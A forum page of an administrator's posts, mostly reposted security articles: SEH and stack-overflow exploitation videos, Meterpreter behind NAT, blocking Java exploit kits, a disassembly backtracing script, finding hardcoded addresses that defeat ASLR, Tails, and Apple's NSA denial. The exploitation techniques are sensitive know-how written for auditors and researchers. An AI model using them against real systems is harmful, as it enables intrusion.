Nytro

Administrators
  • Posts: 18715
  • Joined
  • Last visited
  • Days Won: 701

Everything posted by Nytro

  1. Windows Exploitation (Structured Exception Handler Based Exploitation) Description: This video demos a Structured Exception Handler (SEH) stack overflow exploit. It gives a basic idea of the SEH structure in the Windows operating system and explains the technique used to perform the exploitation. Source: Windows Exploitation (Structured Exception Handler Based Exploitation)
  2. Metasploit Meterpreter and NAT Published January 4, 2014 | By Corelan Team (corelanc0d3r) Professional pentesters typically use a host that is connected directly to the internet, has a public IP address, and is not hindered by any firewalls or NAT devices to perform their audit. Hacking "naked" is considered to be the easiest way to perform a penetration test that involves getting shells back. Not everyone has the luxury of putting a box directly connected to the internet, and as the number of free public IP addresses continues to decrease, the need for using an audit box placed in a LAN, behind a router or firewall, will increase. Putting an audit box behind a device that translates traffic from private to public and vice versa has some consequences. Not only will you need to be sure that the NAT device won't "break" if you start a rather fast portscan, but since the host is in a private LAN, behind a router or firewall, it won't be reachable directly from the internet. Serving exploits and handling reverse, incoming shells can be problematic in this scenario. In this small post, we'll look at how to correctly configure Meterpreter payloads and make them work when your audit box is behind a NAT device. We'll use a browser exploit to demonstrate how to get a working Meterpreter session, even if both the target and the Metasploit "attacker" box are behind NAT. Article: https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/
  3. Windows Exploitation (Simple Stack Overflow) Description: This video demos a simple stack overflow exploit. It gives a basic idea of the application being exploited and the exploit itself, and demos how a debugger can be used to perform the exploitation. Source: Windows Exploitation (Simple Stack Overflow)
  4. Nytro

    Wrong title

    Fixed.
  5. You've started the new year like a bunch of pussies, complaining about every little piece of crap.
  6. Nytro

    Fun stuff

  7. Nytro

    Bug or...

    From what I can tell, I'm set to "invisible".
  8. Nytro

    Bug or...

    Take a screenshot.
  9. Done. Next to "Mark forums as read", at the bottom.
  10. I didn't understand. Should I put a "New posts" link next to "Mark forums as read"?
  11. I've added "Mark forums as read" for you, check whether it works. I've also added a "Send PM" link. Check it.
  12. [h=3]Effective blocking of Java exploits in enterprise environments[/h] [h=2]Preface[/h] "Java every day" was a running joke about Java vulnerabilities, back when a new Java zero-day was seen almost every day. Recently, "Java 0-day spotted in the wild" is no longer in the headlines every week (see http://java-0day.com), but Java exploits are still the biggest concern regarding exploit kits and drive-by-download malware. A recent Kaspersky report found that about 90% of exploit kits were trying to infect the victim machine via Java. [h=2]The "typical useless" recommendations[/h] Okay, so we have a problem called Java in the browser, let's look for a solution! The two simplest "solutions" of all are: Update your Java. Remove Java from your browser. Both solutions are non-solutions for enterprises. Still, a hell of a lot of in-house-built applications need old Java - e.g. 1.6.x, which has been end-of-life since February 2013. The next recommended "solution" is: "Create separate browsers for Internet and intranet usage. The intranet-facing browser supports Java, the Internet-facing one does not." Although this sounds pretty effective, there are still a lot of problems with this approach. Now IT has to update two browsers instead of one. Users have to be trained, and in a web-security gateway (web proxy) one has to configure which browser can go where, etc. And there might still be Java applet based applications outside of the organization which have to be used by a bunch of people. Next solution: "Use NoScript". LOL. Teach NoScript to 50000 users, and see how they will learn "Allow all this page" first, and "Allow scripts globally" the next time. Next solution: "Click-to-play". I think this is a good countermeasure, but from now on the exploit maker either needs an exploit to bypass click-to-play, or has to socially engineer the user into clicking, so this is not a bulletproof solution either. [h=2]The solution[/h] Okay, so far we have five totally useless recommendations. The next one seems pretty good at first sight: "White-list websites which need Java, and only allow Java to these sites." Let's dig deeper. How can we "white-list" sites? This is not supported by Java out-of-the-box. In a decent web-security gateway one can create white-lists, but we have to define a condition for Java traffic. A common misconception is to say: let's identify Java traffic by the .class, .jar, and .jnlp file extensions, and only allow Java for white-listed websites. This will block some exploits, but not all. Here is a screenshot from the very popular Neutrino exploit kit: This is the .jar exploit. As you can see, there is no extension at all in the HTTP request (e.g. .jar). But what about the Mime-type in the response? It is video/quicktime… But it is the jar exploit, with a detection of 2/49 on Virustotal. And, yes, I'm aware of the fact that Virustotal statistics are useless and AV has other possibilities in the exploit chain to block the malware being dropped. Or not. Two things can be flagged here as Java: the User-agent and the Mime-type in the request. I recommend checking for both. The User-agent can be checked via regular expressions, and if one matches, flag it as a Java request (see the sketch at the end of this post). [h=2]Payload delivery[/h] Although not closely related to the exploit, the malware payload delivery is interesting as well. After successful exploitation, the exploit payload downloads the malware from the same site. 
In a normal web-security gateway, executables can be flagged and blocked for average users. Now look at the Neutrino exploit kit: no executable extension (e.g. .exe, .dll), the response Mime-type is faked to audio/mpeg, and even the malware is XOR encrypted with a 4-character key (I leave it as an exercise to the reader to guess the XOR key). Even if the web-security gateway looks for file headers to identify executables, it won't find one. The malware is decrypted only on the victim, where the AV might or might not find it. Although the User-agent here is Java again, be aware of the fact that at this stage the User-agent can be faked by the exploit. [h=2]Mobile devices[/h] If we white-list sites on the web-security gateway, and block any other traffic when we see a Java-based User-agent or content-type, we are good. Well, almost. As long as the client is in the enterprise… What you can do here is force mobile devices to use a VPN every time they are outside of the corporate network, and only connect them to the Internet through the corporate web-security gateway. I know, this is still not a solution, but I can't think of anything better at the moment. Leave a comment if you have a solution for this. Now the only Java threat is that someone hacks one of the white-listed websites in a watering hole attack, and serves the Java exploit from the same page. Not a likely attack, but possible for a real advanced threat. [h=2]Conclusion[/h] If you are a CISO (or hold a similar position), you should proactively block Java exploits. White-listing websites which require Java is not impossible. Not a lot of sites use Java applets nowadays anyway. I would say average users see Java applets more often in an exploit than on a legit site... You can flag Java traffic via a User-agent regular expression, or the content-type (in the request), or both. Special care needs to be taken with mobile devices, which leave the enterprise on a regular basis. Of course, you will need other protections too, because this is not a 100% solution. And if you are a plain home user, you can safely delete Java from your browser, or use a decent Internet Security Suite which can effectively block Java exploits. Posted by Z at 1:30:00 PM Source: Jump ESP, jump!: Effective blocking of Java exploits in enterprise environments
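Here is the sketch mentioned above: a minimal, hypothetical gateway-side filter in Python. It is not from the article; the regular expression and the white-listed hostnames are my own assumptions about what typical Java plugin requests and an enterprise white-list might look like.

import re

# Requests made by the Java plugin / JVM typically carry a User-Agent such as
# "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_33" or "Java/1.7.0_45".
JAVA_UA = re.compile(r"\bJava/1\.[0-9]+(\.[0-9_]+)?", re.IGNORECASE)

# Hypothetical white-list of sites that are allowed to serve Java applets.
WHITELIST = {"intranet.example.com", "legacy-app.example.com"}

def is_java_request(headers):
    """Flag a request as Java-originated based on its User-Agent header."""
    return bool(JAVA_UA.search(headers.get("User-Agent", "")))

def allow(headers, host):
    """Block Java traffic to any host that is not explicitly white-listed."""
    if is_java_request(headers) and host not in WHITELIST:
        return False
    return True

# Example: a request the Java plugin would make to an exploit kit landing host.
print(allow({"User-Agent": "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_33"}, "evil.example.net"))        # False
print(allow({"User-Agent": "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_33"}, "intranet.example.com"))    # True

A real deployment would implement the same condition in the web-security gateway's own policy language and, as the article recommends, also check the request Mime-type.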
  13. The 2013 Top 7 Best Linux Distributions for You Thursday, 14 March 2013 09:00 Katherine Noyes Back in 2010 Linux.com published a list of the year's top Linux distributions, and the popularity of the topic made it an instant annual tradition. There have been several shifts and shakeups on the lists presented since then, of course, and -– as you'll soon see – this year's offering holds true to that pattern. In fact, I think it's safe to say that the past year has seen so much upheaval in the desktop world – particularly where desktop environments are concerned – that 2013's list could come as a surprise to some. Let me hasten to note that the evaluations made here are nothing if not subjective. There also is no such thing as the “one best” Linux distro for anything; in fact, much of the beauty of Linux is its diversity and the fact that it can be tweaked and customized for virtually any taste or purpose. The one best Linux for you, in other words, is the flavor you choose for your purpose and preference and then tweak until it feels just right. Still, I think some Linux flavors stand out these days as leaders for particular use cases. I'm going to diverge a bit from past lists here when it comes to those categories, however. Specifically, where past lists have included the category “Best Linux LiveCD,” I think that's become almost obsolete given not just the general shift to USBs -- some PCs don't even come with CD drives anymore, in fact -- but also the fact that most any Linux distro can be formatted into bootable form. On the other hand, with the arrival of Steam for Linux, I think this year has brought the need for a new category: Best Linux for Gaming. Read on, then, for a rundown of some of the best of what the Linux world has to offer. Best Desktop Distribution There are so many excellent contenders for desktop Linux this year that it's become a more difficult choice than ever – and that's really saying something. Canonical's Ubuntu has made great strides in advancing Linux's visibility in the public eye, of course, while Linux Mint and Fedora are both also very strong choices. Regarding Ubuntu, however, a number of issues have come up over the past year or so, including the inclusion of online shopping results in searches – an addition Richard Stallman and the EFF have called “spyware.” At the same time, the upheaval caused by the introduction of mobile-inspired desktops such as Unity and GNOME 3 continues unabated, spurring the launch of more classically minded new desktops such as MATE and Cinnamon along with brand-new distros. For best desktop Linux distro, I have to go with Fuduntu, one of this new breed of up-and-comers. Originally based on Fedora but later forked, Fuduntu offers a classic GNOME 2 interface – developed for the desktop, not for mobile devices -- and generally seems to get everything right. Besides delivering the classic desktop so many Linux users have made clear that they prefer, Fuduntu enjoys all the advantages of being a rolling release distribution, and its repository includes key packages such as Netflix and Steam. I've been using it for months now and haven't seen a single reason to switch. Best Laptop Distribution At the risk of sounding repetitive, I have to go with Fuduntu for best Linux distro as well. In fact, the distro is optimized for mobile computing on laptops and netbooks, including tools to help achieve maximum battery life when untethered. 
Users can see battery life improvements of 30 percent or more over other Linux distributions, the distro's developers say. Such optimizations combined with this solid and classic distro make for a winner on portable devices as well. Best Enterprise Desktop Linux The enterprise is one context in which I have to agree with recent years' evaluations, and that includes the enterprise desktop. While SUSE Linux Enterprise Desktop is surely RHEL's primary competitor, I think Red Hat Enterprise Linux is the clear leader in this area, with just the right combination of security, interoperability, productivity applications and management features. Best Enterprise Server Linux It's a similar situation on the server. While there's no denying SUSE Linux Enterprise Server has its advantages, Red Hat is pushing ahead in exciting new ways. Particularly notable about Red Hat this year, for example, is its new focus on Big Data and the hybrid cloud, bringing a fresh new world of possibilities to its customers. Best Security-Enhanced Distribution Security, of course, is one of the areas in which Linux really stands out from its proprietary competitors, due not just to the nature of Linux itself but also to the availability of several security-focused Linux distributions. Lightweight Portable Security is one relatively new contender that emerged back in 2011, and BackBox is another popular Ubuntu-based contender, but I still have to give my vote to BackTrack Linux, the heavyweight in this area whose penetration testing framework is used by the security community all over the world. Others surely have their advantages, but BackTrack is still the one to beat. Best Multimedia Distribution Ubuntu Studio has often been named the best distro for multimedia purposes in Linux.com's lists, but it's by no means the only contender. ZevenOS, for instance, is an interesting BeOS-flavored contender that came out with a major update last year. For sheer power and nimble performance, though, this year's nod goes to Arch Linux. With an active community and thousands of software packages available in its repositories, Arch stays out of the way so your PC can focus on the CPU-intensive tasks at hand. Best Gaming Distribution Last but certainly not least is the gaming category, which surely represents one of the biggest developments in the Linux world over this past year. While it may not be relevant for enterprise audiences, gaming has long been held up as a key reason many users have stayed with Windows, so Valve's decision to bring its Steam gaming platform to Linux is nothing if not significant. The Linux distro choice here? That would have to be Ubuntu, which is specifically promoted by the Valve team itself. “Best experienced on Ubuntu” reads the tag line that accompanied the Steam for Linux release last month, in fact. Bottom line: If you're into gaming, Ubuntu Linux is the way to go. Have a different view on any of these categories? Please share your thoughts in the comments. Sursa: The 2013 Top 7 Best Linux Distributions for You | Linux.com
  14. [h=1]BSidesDE 2013 2-2: AntiPwny - A Windows-Based IDS/IPS for Metasploit - Rohan Vazarkar, David Bitner[/h] BSides Delaware 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)
  15. [h=3]backtrace.py version 0.3[/h] backtrace.py version 0.3 has been pushed out to its repo. A couple of notable features have been added. The previous version only tracked the use of the MOV instruction. This is kind of useful... I guess... well, at least it was fun to code. The current version tracks whenever a register (ECX) or its sub-register (CX) is manipulated. The old version relied on string comparisons. For example, if we back trace from the highlighted code upwards, we would see AL referenced, then EAX, then byte_1003B03C, then DL, etc.
.text:10004E99 mov byte_1003B03C, al
.text:10004E9E movsx ecx, byte_1003B03C
.text:10004EA5 imul ecx, 0A2h
.text:10004EAB mov byte_1003B03C, cl
.text:10004EB1 movsx edx, byte_1003B03C
.text:10004EB8 xor edx, 0A4h
.text:10004EBE mov byte_1003B03C, dl
.text:10004EC4 movsx eax, byte_1003B03C
.text:10004ECB cdq
.text:10004ECC mov ecx, 0C8h
.text:10004ED1 idiv ecx
.text:10004ED3 mov byte_1003B03C, al
.text:10004ED8 xor eax, eax
.text:10004EDA jmp short loc_10004F01
.text:10004EDC ; ---------------------------------------------------------------------------
.text:10004EDC movsx edx, byte_1003B03C
.text:10004EE3 or edx, 0D2h
.text:10004EE9 mov byte_1003B03C, dl
.text:10004EEF movsx eax, byte_1003B03C
.text:10004EF6 imul eax, 0C1h
.text:10004EFC mov byte_1003B03C, al
The old version did not know that AL is the low byte of EAX, due to the use of string comparison. The new version does a simple check of the register name and its purpose (see the sketch below). Note: there will be some issues if AH is moved into AL or other similar operations; I didn't code that logic in. If we were to back trace the code above we would have the following output.
Python>s.backtrace(here(),1)
0x10004efc mov byte_1003B03C, al
0x10004ef6 imul eax, 0C1h
0x10004eef movsx eax, byte_1003B03C
0x10004ee9 mov byte_1003B03C, dl
0x10004ee3 or edx, 0D2h
0x10004edc movsx edx, byte_1003B03C
0x10004ed3 mov byte_1003B03C, al
0x10004ec4 movsx eax, byte_1003B03C
0x10004ebe mov byte_1003B03C, dl
0x10004eb8 xor edx, 0A4h
0x10004eb1 movsx edx, byte_1003B03C
0x10004eab mov byte_1003B03C, cl
0x10004ea5 imul ecx, 0A2h
0x10004e9e movsx ecx, byte_1003B03C
0x10004e99 mov byte_1003B03C, al
The code also tracks how some general purpose instructions manipulate different registers. Most of them are simple thanks to the x86 convention of destination, source operand order. Not all of them are, though. I spent a good amount of time wondering which variables to back trace when following instructions such as DIV. Is EAX or the DIV operand more important to back trace? I went with the operand, but in the future I plan on creating a split back trace that will track both EAX and the operand passed to DIV. Odds are there are still more general purpose instructions I need to check for. XADD is a pretty cool instruction. The shortest Fibonacci routine can be written using XADD. This version was written in order for me to crack an obfuscation technique that I have seen lately. Using backtrace.py and the last line of the dead code blocks, I'm able to identify most of the junk code and variables. I'm sure there are flaws (like not tracing PUSH or POP... future release) but so far it is working well for me. I hope the code is of use to others. If you have any recommendations, thoughts, etc. please shoot me an email (line 20 of the source code) or ping me on twitter. Source: Hooked on Mnemonics Worked for Me: backtrace.py version 0.3
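The sketch mentioned above: a minimal Python illustration (my own, not the author's backtrace.py code) of why sub-register awareness matters. It maps each x86 sub-register to its full 32-bit register before comparing operands, which plain string comparison cannot do.

# Maps each x86 sub-register to its full 32-bit register, so a back trace
# knows that e.g. a write to AL also affects EAX.
FULL_REG = {
    "eax": "eax", "ax": "eax", "ah": "eax", "al": "eax",
    "ebx": "ebx", "bx": "ebx", "bh": "ebx", "bl": "ebx",
    "ecx": "ecx", "cx": "ecx", "ch": "ecx", "cl": "ecx",
    "edx": "edx", "dx": "edx", "dh": "edx", "dl": "edx",
    "esi": "esi", "si": "esi",
    "edi": "edi", "di": "edi",
    "ebp": "ebp", "bp": "ebp",
    "esp": "esp", "sp": "esp",
}

def same_register(op_a, op_b):
    """True if the two operands name the same architectural register
    (e.g. 'al' and 'EAX'), which a plain string comparison would miss."""
    a, b = op_a.lower(), op_b.lower()
    if a in FULL_REG and b in FULL_REG:
        return FULL_REG[a] == FULL_REG[b]
    return a == b   # fall back to string comparison for memory operands etc.

print(same_register("al", "EAX"))   # True
print(same_register("cl", "edx"))   # False

As the author notes, this still does not model partial overlaps such as moving AH into AL; it only resolves aliases of the same register.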
  16. [h=3]Hardcoded Pointers[/h] Use of hardcoded pointers could enable an attacker to bypass ASLR. In this draft I'm describing potential methods to find hardcoded pointers in your target. When exploiting particular vulnerabilities it is fundamental to read/write or jump to a predictable memory location in the process' address space. ASLR randomizes various key locations, including the addresses of libraries. Even though we see that some high profile applications still load libraries with ASLR disabled, we have high hopes they will fix the problem soon. That wouldn't solve the problem overall, though. Applying ASLR to all libraries does not mean there are no easily predictable locations in the process' address space. There are API functions that accept an address at which to allocate memory. These functions can be used to hardcode a memory address, and so to assign a fixed address to a pointer (CWE-587). As a consequence, it gives an attacker a chance to read/write or jump to a known address to bypass ASLR. For these functions you can specify the desired starting address that you want to allocate. When doing a security audit it's worth checking whether the functions are called with hardcoded addresses. VirtualAlloc VirtualAllocEx VirtualAllocExNuma MapViewOfFileEx MapViewOfFileExNuma The following functions accept an address to read as a parameter. These do not appear to be as useful, but I leave them here for potential future use. UnmapViewOfFile, WriteProcessMemory, ReadProcessMemory, FlushViewOfFile, FlushInstructionCache, Toolhelp32ReadProcessMemory, GetWriteWatch, ResetWriteWatch, ReadProcessMemoryProc64, VirtualUnlock, MapUserPhysicalPages, VirtualProtect, VirtualProtectEx, VirtualQueryEx, GetFrameSourceAddress, CompareFrameDestAddress, VirtualFree, VirtualFreeEx, FindNextFrame, WSPStringToAddress, CompareAddresses, AddressToString It's also worth checking whether the application you audit uses shared memory, as some applications map the memory at a fixed address, and even the Boost library supports the use of this insecure method. The use of relative pointers is less efficient than using raw pointers, so if a user can succeed in mapping the same file or shared memory object at the same address in two processes, using raw pointers can be a good idea. To map an object at a fixed address, the user can specify that address in the mapped region's constructor:
mapped_region region ( shm                //Map shared memory
                     , read_write         //Map it as read-write
                     , 0                  //Map from offset 0
                     , 0                  //Map until the end
                     , (void*)0x3F000000  //Map it exactly there
                     );
When auditing source code for hardcoded addresses it's worth looking for constants starting with 0x and ending with 0000, as some of them might indicate a hardcoded memory address. I wrote a simple batch script for that (a rough equivalent is sketched at the end of this post). The other batch script I have is for binary code. I recommend using it if you don't find a bug using other methods. To use it you need to execute dasmdir.py on the binary file to produce a disassembly, and you can then run the batch script on it to get the immediate values filtered. This is interesting. Here is an example of someone asking how to allocate memory at a fixed address, unintentionally making his software less secure. Source: Reversing on Windows: Hardcoded Pointers
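The sketch referenced above: a small Python stand-in for the author's batch scripts (which are not reproduced in this post). It flags hex constants that end in four zeros so a human can review them as possible hardcoded addresses; the exact pattern is my own heuristic, not the author's.

import re
import sys

# Constants like 0x3F000000 or 0x10000000 (a hex literal ending in four zeros)
# are candidates for hardcoded memory addresses worth reviewing by hand.
CANDIDATE = re.compile(r"0x[0-9A-Fa-f]{2,4}0000\b")

def scan(path):
    """Print every suspicious hex constant found in a source or disassembly file."""
    with open(path, errors="replace") as f:
        for lineno, line in enumerate(f, 1):
            for match in CANDIDATE.finditer(line):
                print(f"{path}:{lineno}: {match.group(0)}  |  {line.strip()}")

if __name__ == "__main__":
    # e.g. python scan_hardcoded.py source.c disasm.txt
    for filename in sys.argv[1:]:
        scan(filename)

Expect false positives (sizes, flags, masks); the point is only to shortlist constants for manual review, as the post suggests.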
  17. toolsmith: Tails - The Amnesiac Incognito Live System Privacy for anyone anywhere Prerequisites/dependencies Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM Introduction “We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.” -Edith Lovejoy Pierce First and foremost, Happy New Year! If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label. The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part. In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable." Ars Technica’s Dan Goodin described Operation Bullrun as a “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.” Finally, consider that, again as reported by DanG, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers." I must admit I am conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it. Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security? 
While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause. Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time. Tails Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) Linux distribution that works optimally as a live instance via DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention with the Tor anonymity network to protect your privacy online. All software is configured to connect to the Internet through Tor, and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes. At this point the well informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn't mean that you can't safely use Tor in a manner that protects you. This is a great opportunity, however, to direct you to the Tails warning page. Please read this before you do anything else, it's important. Schneier's Guardian article also provides nuance. “The fact that all Tor users look alike on the internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.” Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume; just remember to format the USB media in a manner that leaves room to create the persistent volume. When you boot Tails, the first thing you'll see, as noted in Figure 1, is the Tails Greeter, which offers you More Options. Selecting Yes leads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers). FIGURE 1: Tails Greeter You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). However, Tails will warn you as seen in Figure 2. FIGURE 2: Tails warns regarding a VM and confirms Tor Tor You'll also note in Figure 2 that TorBrowser (built on Iceweasel, a Firefox alternative) is already configured to use Tor, including the Torbutton, as well as NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the boot menu sequence for Tails, where you can interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode. According to the Tor Project, bridge relays (or bridges for short) are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges. 
If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature, which is fully supported by Tails when booting in bridge mode. Control Tor with Vidalia, which is available via the onion icon in the notification area found in the upper right area of the Tails UI. One last note on Tor use, as already described on the Tails Warning page you should have already read. Your Tor use is only as good as your exit node. Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it, and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2P as an alternative to Tor. Encryption Options and Features HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses a ruleset with regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS, but make it difficult to use where they may default to unencrypted HTTP, or provide hyperlinks on encrypted pages that point back to the unencrypted site. You can use Pidgin for instant messaging, which includes OTR or off-the-record encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts. If you're afraid the computer you've booted Tails on (a system in an Internet café or library) is not trustworthy due to the likes of a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area, as seen in Figure 3. FIGURE 3: The Tails virtual keyboard If you're going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence with the Tails Greeter. You will need to set up the USB stick to leave unused space for a persistent volume. You can securely wipe files and clean up available space thereafter with Nautilus Wipe. Just right click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity. KeePassX is available to securely manage passwords and store them on your persistent volume. You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation. You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard in the notification area). One last cool Tails feature that doesn't garner much attention is the Metadata Anonymisation app. This is not unlike Informatica 64's OOMetaExtractor, from the same folks who bring you FOCA, as described in the March 2011 toolsmith. Metadata Anonymisation is found under Applications, then Accessories. This application will strip all of those interesting file properties left in metadata, such as author names and dates of creation or change. I have used my share of metadata to create a target list for social engineering during penetration tests, so it's definitely a good idea to clean docs if you're going to publish or share them, if you wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave. 
There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System and I strongly advocate for you keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those of you non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein). Conclusion Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column. The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read. Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me via Twitter via @holisticinfosec or email if you have questions (russ at holisticinfosec dot org). Cheers…until next month. Posted by Russ McRee at 9:58 AM Sursa: HolisticInfoSec: toolsmith: Tails - The Amnesiac Incognito Live System
  18. Apple Says It Has Never Worked With NSA To Create iPhone Backdoors, Is Unaware Of Alleged DROPOUTJEEP Snooping Program Posted yesterday by Matthew Panzarino (@panzer) Apple has contacted TechCrunch with a statement about the DROPOUTJEEP NSA program that detailed a system by which the organization claimed it could snoop on iPhone users. Apple says that it has never worked with the NSA to create any ‘backdoors’ that would allow that kind of monitoring, and that it was unaware of any programs to do so. Here is the full statement from Apple: Apple has never worked with the NSA to create a backdoor in any of our products, including iPhone. Additionally, we have been unaware of this alleged NSA program targeting our products. We care deeply about our customers’ privacy and security. Our team is continuously working to make our products even more secure, and we make it easy for customers to keep their software up to date with the latest advancements. Whenever we hear about attempts to undermine Apple’s industry-leading security, we thoroughly investigate and take appropriate steps to protect our customers. We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks, regardless of who’s behind them. The statement is a response to a report in Der Spiegel Sunday that detailed a Tailored Access Operations (TAO) unit within the NSA that is tasked with gaining access to foreign computer systems in order to retrieve data to protect national security. The report also pointed out a division called ANT that was set up to compile information about hacking consumer electronics, networking systems and more. The story detailed dozens of devices and methods, including prices for deployment, in a catalogue that could be used by the NSA to pick and choose the tools it needed for snooping. The 50-page catalog included a variety of hacking tools that targeted laptops and mobile phones and other consumer devices. Der Spiegel said that these programs were evidence that the NSA had ‘backdoors’ into computing devices that many consumers use. Among these options was a program called DROPOUTJEEP — a program by which the NSA could theoretically snoop on ‘any’ Apple iPhone with ’100% success’. The documents were dated 2008, implying that these methods were for older devices. Still, the program’s detailed capabilities are worrisome. Researcher and hacker Jacob Applebaum — the co-author of the articles, coinciding with a speech he gave at a conference about the programs — pointed out that the ’100% success rate’ claimed by the NSA was worrisome as it implied cooperation by Apple. The statement from the company appears to preclude that cooperation. The program detail indicated that the NSA needed physical access to the devices at the time that the documents were published. It does note that they were working on ‘remote installation capability’ but there’s no indication whether that was actually successful. The program’s other options included physical interdiction of devices like laptops to install snooping devices — but there have been security advances like hardware encryption in recent iPhone models that would make modification of devices much more difficult. Early reports of the DROPOUTJEEP program made it appear as if every iPhone user was vulnerable to this — which simply can’t be the case. Physical access to a device was required which would preclude the NSA from simply ‘flipping a switch’ to snoop on any user. 
And Apple patches security holes with every version of iOS. The high adoption rate of new versions of iOS also means that those patches are delivered to users very quickly and on a large scale. The jailbreak community, for instance, knows that once a vulnerability has been used to open up the iPhone’s file system for modification, it’s been ‘burned’ and will likely be patched by Apple quickly. And the process of jailbreaking fits the profile of the capabilities the NSA was detailing in its slide. Applebaum’s walked listeners through a variety of the programs including DROPOUTJEEP. He noted that the claims detailed in the slide indicated that either Apple was working with the NSA to give them a backdoor, or the NSA was just leveraging software vulnerabilities to create its own access. The Apple statement appears to clear that up — pointing to vulnerabilities in older versions of iOS that have likely since been corrected. I do also find it interesting that Apple’s statement uses extremely strong wording in response to the NSA program. “We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks,” the statement reads, “regardless of who’s behind them.” Lumping the program in with ‘malicious hackers’ certainly makes a clear point. This year has been an eventful one for NSA spying program revelations. Apple joined a host of large companies that denied that they had been willing participants in the PRISM data collection system — but later revelations of the MUSCULAR program indicated that the NSA could get its hands on data by monitoring internal company server communications anyway. This spurred targets like Google and Yahoo to implement internal encryption. Last month, Apple released its first ever report on government information requests, detailing the number of times domestic and foreign governments had asked it for user information. At the time, it also filed a suit with the U.S. Government to allow it to be more transparent about the number and frequency of those requests. It also began employing a ‘warrant canary’ to warn users of future compliance with Patriot Act information requests. Most recently, 